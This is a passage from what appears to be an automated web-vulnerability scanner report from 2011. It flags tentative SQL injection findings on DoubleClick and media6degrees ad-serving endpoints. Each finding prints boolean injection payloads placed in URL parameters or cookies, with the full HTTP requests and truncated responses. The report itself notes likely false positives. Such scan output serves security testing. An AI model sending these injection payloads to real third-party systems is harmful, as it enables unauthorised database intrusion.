Referer: http://as.webmd.com/html.ng/transactionID=3844899260203&tile=3844899260203&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=113
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 16:06:08 GMT
Content-Length: 5241

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Apr 29 18:45:00 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3167159/baseball-160x600_v04k-centered.swf";
var gif = "http://s0.2mdn.net/3167159/baseball160x600END.gif";
var minV = 10;
var FWH = ' width="160" height="600" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/f%3B240620426%3B2-0%3B0%3B63480066%3B2321-160/600%3B41962628/41980415/1%3B%3B%7Esscs%3D%3fhttp://www.nationaljewish.org/treatment/asthma.aspx");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/f%3B240620426%3B2-0%3B0%3B63480066%3B2321-160/600%3B41962628/41980415/1%3B%3B%7Esscs%3D%3fhttp://www.nationaljewish.org/treatment/asthma.aspx");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTAG";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/f%3B240620426%3B2-0%3B0%3B63480066%3B2321-160/600%3B41962628/41980415/1%3B%3B%7Esscs%3D%3f" + ctVal);
}
if(ctParam.toLowerCase() == "clicktag") {
fscUrl = ctVal;
fscUrlClickTagFound = true;
}
else if(!fscUrlClickTagFound) {
fscUrl = ctVal;
}
fv += "&" + ctParam + "=" + ctVal;
}
}
fv+='"';
var bgo=(bg=="")?"":'
...[SNIP]...

1.10. http://ad.doubleclick.net/adj/N6715.274177.WEBMD.COM/B5443050.15 [sz parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N6715.274177.WEBMD.COM/B5443050.15

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. The payloads 20368142'%20or%201%3d1--%20 and 20368142'%20or%201%3d2--%20 were each submitted in the sz parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/N6715.274177.WEBMD.COM/B5443050.15;sz=160x600;ord=btINbge,bgNvkRnyikao?20368142'%20or%201%3d1--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=3844899260203&tile=3844899260203&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=113
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 16:04:54 GMT
Content-Length: 5271

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Apr 29 17:39:59 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3167159/baseball-160x600_v04k-centered.swf";
var gif = "http://s0.2mdn.net/3167159/baseball160x600END.gif";
var minV = 10;
var FWH = ' width="160" height="600" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/n%3B240620426%3B1-0%3B0%3B63480066%3B2321-160/600%3B41961067/41978854/1%3B%3B%7Esscs%3D%3fhttp://www.nationaljewish.org/treatment/asthma-treatment.aspx");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/n%3B240620426%3B1-0%3B0%3B63480066%3B2321-160/600%3B41961067/41978854/1%3B%3B%7Esscs%3D%3fhttp://www.nationaljewish.org/treatment/asthma-treatment.aspx");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTAG";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/n%3B240620426%3B1-0%3B0%3B63480066%3B2321-160/600%3B41961067/41978854/1%3B%3B%7Esscs%3D%3f" + ctVal);
}
if(ctParam.toLowerCase() == "clicktag") {
fscUrl = ctVal;
fscUrlClickTagFound = true;
}
else if(!fscUrlClickTagFound) {
fscUrl = ctVal;
}
fv += "&" + ctParam + "=" + ctVal;
}
}
fv+='"';
v
...[SNIP]...

Request 2

GET /adj/N6715.274177.WEBMD.COM/B5443050.15;sz=160x600;ord=btINbge,bgNvkRnyikao?20368142'%20or%201%3d2--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=3844899260203&tile=3844899260203&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=113
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 16:04:55 GMT
Content-Length: 5247

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Apr 29 19:10:04 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3167159/basketball-160x600_v04k-centered.swf";
var gif = "http://s0.2mdn.net/3167159/Basketball160x600END.gif";
var minV = 10;
var FWH = ' width="160" height="600" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/c%3B240620426%3B3-0%3B0%3B63480066%3B2321-160/600%3B41963206/41980993/1%3B%3B%7Esscs%3D%3fhttp://www.nationaljewish.org/treatment/asthma.aspx");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/c%3B240620426%3B3-0%3B0%3B63480066%3B2321-160/600%3B41963206/41980993/1%3B%3B%7Esscs%3D%3fhttp://www.nationaljewish.org/treatment/asthma.aspx");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTAG";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/c%3B240620426%3B3-0%3B0%3B63480066%3B2321-160/600%3B41963206/41980993/1%3B%3B%7Esscs%3D%3f" + ctVal);
}
if(ctParam.toLowerCase() == "clicktag") {
fscUrl = ctVal;
fscUrlClickTagFound = true;
}
else if(!fscUrlClickTagFound) {
fscUrl = ctVal;
}
fv += "&" + ctParam + "=" + ctVal;
}
}
fv+='"';
var bgo=(bg=="")?
...[SNIP]...

1.11. http://ad.doubleclick.net/adj/trb.zap2it/ntl/people [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/people

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/trb.zap2it/ntl/people;sz=300x250;pos=2;usr=u;rs=10011;rs=10030;rs=10070;rs=70008;rs=70010;rs=70118;rs=70613;rs=72078;ord=1351509551?&1%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://people.zap2it.com/p/owen-wilson/74682?aid=zap2it
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript; charset=UTF-8
Date: Wed, 11 May 2011 15:57:09 GMT
Content-Length: 4688

var divid='dclkAdsDivID_22382';
document.write('<div id=' + divid + '></div>');
var adsenseHtml_22382 = "<html><head></head><body leftMargin=\"0\" topMargin=\"0\" marginwidth=\"0\" marginheight=\"0\">
...[SNIP]...
<script>vu(\"http://adx.g.doubleclick.net/pagead/adview?ai\\x3dBVLJ51LHKTcrHLJmt6Ab2us2fDZXBq-QB1eKHshaF1Y-XEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi03MTMxOTkwMzIzNzE4NTE5sgERcGVvcGxlLnphcDJpdC5jb226AQozMDB4MjUwX2FzyAEJ2gE3aHR0cDovL3Blb3BsZS56YXAyaXQuY29tL3Avb3dlbi13aWxzb24vNzQ2ODI_YWlkPXphcDJpdJgC7grAAgTIAu-b5QmoAwHoA7gB6AMi6APHCPUDAAAARA\\x26sigh\\x3d2Apx3dEaN5w\")</script> <a id=\"hal_livingSocial_adX_baseline_E\" href=\"http://livingsocial.com/deals/socialads_reflector?do_not_redirect=1&geo=true&ref=socialmedia_hal_livingSocial_adX_F_backup\" target=\"_blank\"><img style=\"border:none\" src=\"http://static.socialmedia.com/ads/LivingSocial/RSS/backup/image.jpg\"/></a><div id=\"hal_livingSocial_adX_baseline_E-parent\"></div><img src=\"http://api.socialmedia.com/services/stats/v1/buckets/groups/entities/hal_livingSocial_adX_baseline_E/events/request.gif\" style=\"position: absolute; left: -16384px\" /><script>(function (){\n \n var clickTag=\'http://googleads.g.doubleclick.net/aclk?sa=l&ai=BVLJ51LHKTcrHLJmt6Ab2us2fDZXBq-QB1eKHshaF1Y-XEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi03MTMxOTkwMzIzNzE4NTE5sgERcGVvcGxlLnphcDJpdC5jb226AQozMDB4MjUwX2FzyAEJ2gE3aHR0cDovL3Blb3BsZS56YXAyaXQuY29tL3Avb3dlbi13aWxzb24vNzQ2ODI_YWlkPXphcDJpdJgC7grAAgTIAu-b5QmoAwHoA7gB6AMi6APHCPUDAAAARA&num=1&sig=AGiWqtygYZq9H1ISPlbi1G6aLlzmGjznpA&client=ca-pub-7131990323718519&adurl=\';\n \n var SocialMediaAds=[{\"groupId\":\"hal_livingSocial_adX_baseline_E\",\"adServerUrl\":\"http://api.socialmedia.com//services/adserver/v2\",\"width\":\"300\",\"height\":\"250\",\"clickthroughUrl\":\"http://livingsocial.com/deals/socialads_reflector?do_not_redirect=1&geo=true&ref=socialmedia_hal_livingSocial_adX_F_backup\",\"adDisplayServerVersion\":\"v2/ad-display-server.js.gz\",\"backupImageUrl\":\"http://static.socialmedia.com/ads/LivingSocial/RSS/backup/image.jpg\",\"advertiserId\":\"livingSocial\",\"publisherId\":\"adX\",\"campaignId\":\"livingSocialCampaign\",\"clickTag\":\"\" + clickTag + 
\"\",\"adEmbedTime\":(+new Date).toString()}];\n for (var i=0,l=Soci
...[SNIP]...

Request 2

GET /adj/trb.zap2it/ntl/people;sz=300x250;pos=2;usr=u;rs=10011;rs=10030;rs=10070;rs=70008;rs=70010;rs=70118;rs=70613;rs=72078;ord=1351509551?&1%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://people.zap2it.com/p/owen-wilson/74682?aid=zap2it
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript; charset=UTF-8
Date: Wed, 11 May 2011 15:57:10 GMT
Content-Length: 4661

var divid='dclkAdsDivID_2530';
document.write('<div id=' + divid + '></div>');
var adsenseHtml_2530 = "<html><head></head><body leftMargin=\"0\" topMargin=\"0\" marginwidth=\"0\" marginheight=\"0\"><s
...[SNIP]...
<script>vu(\"http://adx.g.doubleclick.net/pagead/adview?ai\\x3dBjfbI1rHKTe71B8Gk6Ab557DtDJXBq-QB1eKHshaF1Y-XEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi03MTMxOTkwMzIzNzE4NTE5sgERcGVvcGxlLnphcDJpdC5jb226AQozMDB4MjUwX2FzyAEJ2gE3aHR0cDovL3Blb3BsZS56YXAyaXQuY29tL3Avb3dlbi13aWxzb24vNzQ2ODI_YWlkPXphcDJpdJgC7grAAgTIAu-b5QmoAwHoA7gB6AMi6APHCPUDAAAARA\\x26sigh\\x3dgN1C0XIr06E\")</script> <a id=\"hal_livingSocial_adX_baseline_E\" href=\"http://livingsocial.com/deals/socialads_reflector?do_not_redirect=1&geo=true&ref=socialmedia_hal_livingSocial_adX_F_backup\" target=\"_blank\"><img style=\"border:none\" src=\"http://static.socialmedia.com/ads/LivingSocial/RSS/backup/image.jpg\"/></a><div id=\"hal_livingSocial_adX_baseline_E-parent\"></div><img src=\"http://api.socialmedia.com/services/stats/v1/buckets/groups/entities/hal_livingSocial_adX_baseline_E/events/request.gif\" style=\"position: absolute; left: -16384px\" /><script>(function (){\n \n var clickTag=\'http://googleads.g.doubleclick.net/aclk?sa=l&ai=BjfbI1rHKTe71B8Gk6Ab557DtDJXBq-QB1eKHshaF1Y-XEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi03MTMxOTkwMzIzNzE4NTE5sgERcGVvcGxlLnphcDJpdC5jb226AQozMDB4MjUwX2FzyAEJ2gE3aHR0cDovL3Blb3BsZS56YXAyaXQuY29tL3Avb3dlbi13aWxzb24vNzQ2ODI_YWlkPXphcDJpdJgC7grAAgTIAu-b5QmoAwHoA7gB6AMi6APHCPUDAAAARA&num=1&sig=AGiWqtzKZVNKOXHX9H19sLJ2AIhEkZTdTw&client=ca-pub-7131990323718519&adurl=\';\n \n var SocialMediaAds=[{\"groupId\":\"hal_livingSocial_adX_baseline_E\",\"adServerUrl\":\"http://api.socialmedia.com//services/adserver/v2\",\"width\":\"300\",\"height\":\"250\",\"clickthroughUrl\":\"http://livingsocial.com/deals/socialads_reflector?do_not_redirect=1&geo=true&ref=socialmedia_hal_livingSocial_adX_F_backup\",\"adDisplayServerVersion\":\"v2/ad-display-server.js.gz\",\"backupImageUrl\":\"http://static.socialmedia.com/ads/LivingSocial/RSS/backup/image.jpg\",\"advertiserId\":\"livingSocial\",\"publisherId\":\"adX\",\"campaignId\":\"livingSocialCampaign\",\"clickTag\":\"\" + clickTag + 
\"\",\"adEmbedTime\":(+new Date).toString()}];\n for (var i=0,l=Soci
...[SNIP]...

1.12. http://cspix.media6degrees.com/orbserv/hbpix [acs cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The acs cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the acs cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.medicinenet.com%2fpink_eye%2farticle.htm HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt117s3uxzt1tr37xzt1tr37xzt117s3uxzt117rw8'%20and%201%3d1--%20; adh=1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh17san01o3n070k0r51a; rdrlst=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; sglst=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; vstcnt=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

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1ljtllpxzt117v6hxzt1tr37xzt1tr37xzt117v6hxzt117rw8; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:07:18 GMT; Path=/
Set-Cookie: adh="1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh17v6h01p3n080k0s51b; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:07:18 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=4330pahlkze3o0000000j3n08157olkxlm50000000r3n08144qlkze3o0000000j3n0813y7lkze3o0000000j3n080hsnlkze3o0000000j3n0815sklkkpqq000000143n0812nslkxrxz0000000l3n0812gdlkkyy0000000103n080morlkkxrb000000113n0814k6lkxlm50000000r3n080w35lkze3o0000000j3n0813pylkze3o0000000j3n0814rwlkxlm50000000r3n081628lkze3y0000000h3n08132dlkzsmp0000000a3n0814khlkxlm50000000r3n081196lkkkbe0000001a3n0813x4lkxrxz0000000l3n08106sll1gs6000000013n0113qmlkze3y0000000h3n081195lkkpqh000000153n081194lkkjj40000001b3n0816nulkxlm50000000r3n0813q8lkze3y0000000h3n081193lkkplo000000173n081192lkkpke000000193n080p46lkkpqq000000143n080zg4lkze3y0000000h3n08144elkze3o0000000j3n0813qwlkze4r0000000g3n0810poljyxb40000001m3n08106llkzt2k000000093n080e6llkl0r50000000x3n0816dnlkze3o0000000j3n08138olkxrxz0000000l3n0816y4ll1dpj000000043n04167ulkxq410000000m3n08159olk8fax0000001h3n0814qllkxlm50000000r3n0815halkxlm50000000r3n080m0plkkxrb000000113n0816e6lkxnbq0000000q3n0813zblkze3y0000000h3n0814xnlkxlm50000000r3n0816dxlkze3o0000000j3n081391lkxrxz0000000l3n0815zhlkze3y0000000h3n081672lkkxrb000000113n080ycrlkncow0000000v3n080okclkze3o0000000j3n08158mlkze3o0000000j3n081015lkze3y0000000h3n0813lelkxrxz0000000l3n0813yolkze3o0
...[SNIP]...

Request 2

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.medicinenet.com%2fpink_eye%2farticle.htm HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt117s3uxzt1tr37xzt1tr37xzt117s3uxzt117rw8'%20and%201%3d2--%20; adh=1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh17san01o3n070k0r51a; rdrlst=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; sglst=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; vstcnt=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

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh17v6i01p3n080k0s51b; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:07:19 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=...[SNIP]...
...[SNIP]...

1.13. http://cspix.media6degrees.com/orbserv/hbpix [clid cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The clid cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the clid cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.medicinenet.com%2fpink_eye%2farticle.htm HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
